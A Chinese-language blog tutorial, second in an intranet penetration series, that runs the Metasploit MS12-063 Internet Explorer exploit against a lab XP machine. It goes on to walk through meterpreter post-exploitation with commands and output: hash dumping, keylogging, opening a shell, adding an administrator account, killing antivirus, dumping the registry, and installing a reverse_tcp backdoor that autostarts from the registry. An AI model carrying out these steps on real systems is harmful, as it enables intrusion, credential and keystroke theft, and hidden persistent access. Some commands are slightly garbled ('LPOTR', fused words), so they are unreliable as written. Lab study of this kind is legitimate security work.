内网渗透二：meterpreter的一些利用

0x01填坑：

我在这里填一下上一篇文章中的坑哈：

我们使用了exploit/windows/browser/ie_execcommand_uaf IE浏览器的这个EXP，但是执行之后发现目标主机虽然跳转了，但是有个报错：

（接第一篇）靶机被强行跳转到被监听的URL

MSF成功监听到

（但，貌似是虚拟机装的XP把这个漏洞补了，所以没产生session会话）

过后查了这个原因好久，在Mickey牛的教导下，终于发现了报错的原因：

msf下输入 exploit/windows/browser/ie_execcommand_uaf

0x02找到问题：

执行info，查看该EXP的信息，发现这个EXP原来是针对XP SP3、Vista的IE7、IE8以及Win7的IE8、IE9。

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

msf exploit(ie_execcommand_uaf) > info

       Name: MS12-063Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

     Module: exploit/windows/browser/ie_execcommand_uaf

   Platform: Windows

 Privileged: No

    License: Metasploit Framework License (BSD)

       Rank: Good

Provided by:

  unknown

  eromang

  binjo

  sinn3r <sinn3r@metasploit.com>

  juan vazquez <juan.vazquez@metasploit.com>

Available targets:

  Id  Name

  --  ----

  0  Automatic

  1  IE 7on Windows XP SP3

  2  IE 8on Windows XP SP3

  3  IE 7on Windows Vista

  4  IE 8on Windows Vista

  5  IE 8on Windows 7

  6  IE 9on Windows 7

Basic options:

  Name        Current Setting  Required  Description

  ----        ---------------  --------  -----------

  OBFUSCATE  false           no        Enable JavaScript obfuscation

  SRVHOST    172.16.244.129  yes       The local host to listen on. This must be an address on the local machine or0.0.0.0

  SRVPORT    8080            yes       The local port to listen on.

  SSL        false           no        Negotiate SSL forincoming connections

  SSLCert                      no        Path to a custom SSL certificate (defaultis randomly generated)

  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

  URIPATH                      no        The URI to use forthis exploit (defaultis random)

Payload information:

Description:

  This module exploits a vulnerability found in Microsoft Internet

  Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object

  gets deleted in an unexpected manner, but the same memory is reused

  again later in the CMshtmlEd::Exec() function, leading to a

  use-after-free condition. Please note that thisvulnerability has

  been exploited in the wild since Sep 142012. Also note that

  presently,thismodule has some target dependencies forthe ROP

  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present

  (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9,

  JRE1.6.x or below must be installed (which is often the case).

然后默默地去下载了XP SP3、安装IE7（刚安装好的XP SP3使用的是IE6）

（安装、重启、重新操作了第一篇里的步骤 So 省略若干字….）

0x03 EXP successful：

终于，返回了successful！

sessions：
sessions -i 1

sysinfo ipconfig ps hashdump…

0x04常用命令：

截屏：

screenshot

键盘记录：

?

1

2

3

4

5

6

7

8

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against SPRITEKI-674621

[*] Starting the keystroke sniffer...

[*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172.16.244.136_host.windows.key_879494.txt

[*] Recording keystrokes...

^C[*] Saving last few keystrokes...

[*] Interrupt

[*] Stopping keystroke sniffer...

执行cmd:

meterpreter>shell
添加用户：

net user add name password /add
添加用户到管理组：

net localgroup administrator name /add
 

因为是内网 开启3389也没什么意义了

Kill 杀软

?

1

 

meterpreter > run scraper [*] New session on 172.16.244.136:1114... [*] Gathering basic system information... [*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied. [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg) [*] Cleaning HKU [*] Completed processing on 172.16.244.136:1114... 

控制持久化

?

1

2

3

4

5

6

7

8

9

10

meterpreter > run persistence -X -i 203376 -r 172.16.244.129

[*] Running Persistance Script

[*] Resource file forcleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc

[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129LPORT=4444

[*] Persistent agent script is 609466bytes long

[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs

[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs

[+] Agent executed with PID 1112

[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI

[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI

use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPOTR exploit

在meterpreter下使用Windows API编程，以弹Hello world窗示例

?

1

2

3

4

meterpreter > irb

[*] Starting IRB shell

[*] The 'client'variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")